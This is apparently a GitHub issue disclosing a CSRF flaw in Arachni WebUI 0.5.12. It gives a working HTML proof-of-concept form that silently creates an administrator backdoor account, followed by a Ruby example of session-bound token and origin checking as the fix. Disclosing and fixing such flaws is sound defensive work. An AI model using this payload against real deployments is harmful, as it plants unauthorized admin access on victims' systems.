Arachni / arachni

Web Application Security Scanner Framework
http://www.arachni-scanner.com

CSRF vulnerability: rule/config manipulation and backdoor implementation #1048

Open dfezza opened 4 years ago

dfezza commented 4 years ago

Vulnerable components: Arachni v1.5.1 - WebUI v0.5.12

Steps:

  1. The victim logs in to their Arachni account first.
  2. An attacker sends a form/link to the victim.
  3. If the victim clicks the form/link, an item (rule set or new user) would automatically change the rule set or add a new user (backdoor) to the victim's configuration.

Cross-Site Request Forgery (CSRF) PoC to add a backdoor-account:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:9292/users" method="POST">
      <input type="hidden" name="utf8" value="&#10003;" />
      <input type="hidden" name="authenticity&#95;token" value="MjWHU198l&#47;sSd&#47;2IKpPJWDuv1WJziw90AuNHj3pMrO&#47;uyidswqmseuhavNrwsuHp0UfSs5uC8IEtaq3TxHflWg&#61;&#61;" />
      <input type="hidden" name="user&#91;name&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;password&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;email&#93;" value="backdooruser&#64;backdooruser&#46;com" />
      <input type="hidden" name="user&#91;password&#95;confirmation&#93;" value="backdooruser" />
      <input type="hidden" name="user&#91;role&#95;ids&#93;&#91;&#93;" value="1" />
      <input type="hidden" name="user&#91;role&#95;ids&#93;&#91;&#93;" value="" />
      <input type="hidden" name="commit" value="Create&#32;User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Solution: Add a CSRF token to the POST forms.
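Added example (not Arachni's or the reporter's code) of what the suggested fix has to enforce: the authenticity token must be bound to the session that sends the cookie, so a token copied into a forged form from another session (like the hard-coded one in the PoC above) is rejected, and an Origin/Referer check is layered on top. The session hash, the `expected_origin` default of `http://127.0.0.1:9292`, and the `create_user_request` handler are assumptions made for the example; in a Rails app the same check is what `protect_from_forgery with: :exception` provides.

```ruby
require "securerandom"
require "uri"

# Constructed example, not Arachni's code. A session is modelled as a plain
# Hash that the server keeps per cookie; the token lives only there.

# Mint (or reuse) the per-session CSRF token that the server embeds in its
# own forms as the authenticity_token field.
def csrf_token_for(session)
  session[:csrf_token] ||= SecureRandom.base64(32)
end

# Constant-time string comparison so the token check does not leak
# how many leading bytes matched.
def secure_equal?(a, b)
  return false unless a.bytesize == b.bytesize
  diff = 0
  a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
  diff.zero?
end

# Reduce a URL to scheme://host:port for an exact origin comparison
# (a prefix match would accept look-alike hosts).
def origin_of(url)
  u = URI.parse(url)
  return nil if u.scheme.nil? || u.host.nil?
  "#{u.scheme}://#{u.host}:#{u.port}"
rescue URI::InvalidURIError
  nil
end

# Browsers send Origin on cross-site POSTs; fall back to Referer. A request
# that carries neither is rejected rather than waved through (assumption:
# the app's own forms always produce one of the two).
def same_origin?(headers, expected_origin)
  source = headers["Origin"] || headers["Referer"]
  return false if source.nil?
  origin_of(source) == origin_of(expected_origin)
end

# The check itself: a token is only valid for the session it was minted in.
def csrf_valid?(session, params, headers, expected_origin: "http://127.0.0.1:9292")
  stored = session[:csrf_token]
  submitted = params["authenticity_token"]
  return false if stored.nil? || submitted.nil?
  return false unless secure_equal?(stored, submitted)
  same_origin?(headers, expected_origin)
end

# Hypothetical POST /users handler: returns [status, message] instead of
# creating anything, so the outcome of each request can be inspected.
def create_user_request(session, params, headers)
  return [403, "invalid authenticity token"] unless csrf_valid?(session, params, headers)
  [201, "user #{params.fetch('user[name]', '?')} created"]
end

if __FILE__ == $PROGRAM_NAME
  victim = {}
  token = csrf_token_for(victim)
  legit = { "authenticity_token" => token, "user[name]" => "alice" }
  puts create_user_request(victim, legit, { "Origin" => "http://127.0.0.1:9292" }).inspect

  # Forged form: token minted in the attacker's own session, cross-site Origin.
  attacker = {}
  forged = { "authenticity_token" => csrf_token_for(attacker), "user[name]" => "backdooruser" }
  puts create_user_request(victim, forged, { "Origin" => "http://attacker.example" }).inspect
end
```

Binding the token to the session is the part that matters: a token the attacker obtained from their own login is useless against the victim's cookie. The origin check and a `SameSite=Lax` session cookie are defence in depth, not a substitute for the token.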